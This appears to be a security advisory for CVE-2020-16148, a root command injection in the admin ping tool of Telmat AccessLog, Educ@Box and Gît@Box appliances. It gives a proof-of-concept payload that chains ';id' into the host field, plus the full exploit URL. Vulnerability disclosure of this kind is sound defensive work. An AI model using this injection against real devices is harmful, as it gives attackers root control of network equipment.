CVE-2020-16148 - Telmat - Authenticated root RCE

  • Title : Telmat - Authenticated root Remote Code Execution
  • Author : @Podalirius
  • CVSS : 7.2 (High)
  • CVSS Vector : CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

An authenticated code injection on the “Administration avancée” (Advanced administration) page of Telmat AccessLog, Gît@Box and Educ@Box with software version <= 6.0 (TAL_20180415) allows Remote Code Execution (RCE) as root.

Affected products :

Manufacturer Model Software version
TelMat AccessLog <= 6.0 (TAL_20180415)
TelMat Educ@Box <= 6.0 (TAL_20180415)
TelMat Gît@Box <= 6.0 (TAL_20180415)

Exploitation

This vulnerability was tested on a Telmat AccessLog 6.0 (TAL_20180415):

An attacker needs to have an account on the device with access to the administration interface. Then, the attacker goes on the “Administration avancée” (Advanced administration) of the administration panel, to use test tools :

https://${TELMAT_IP}:${PORT}/services/cmd.php?lang=fr&CMD=ping&host=127.0.0.1

This page allows an administrator to use ping, traceroute and other tools to debug the network configurations. However, the command input is not filtered and is directly executed by a shell. Therefore, we can simply inject commands directly into the system shell :

Command : ping
Payload : 127.0.0.1 -c0; id

Full POC URL : https://${TELMAT_IP}:${PORT}/services/cmd.php?lang=fr&CMD=ping&host=127.0.0.1%20-c0%3B%20id

We have there a Remote Code Execution (RCE), and furthermore we are directly root on the system :

Proof of Concept - Authenticated RCE

Mitigations

In order to patch this vulnerability you need to update your firmware to the latest version.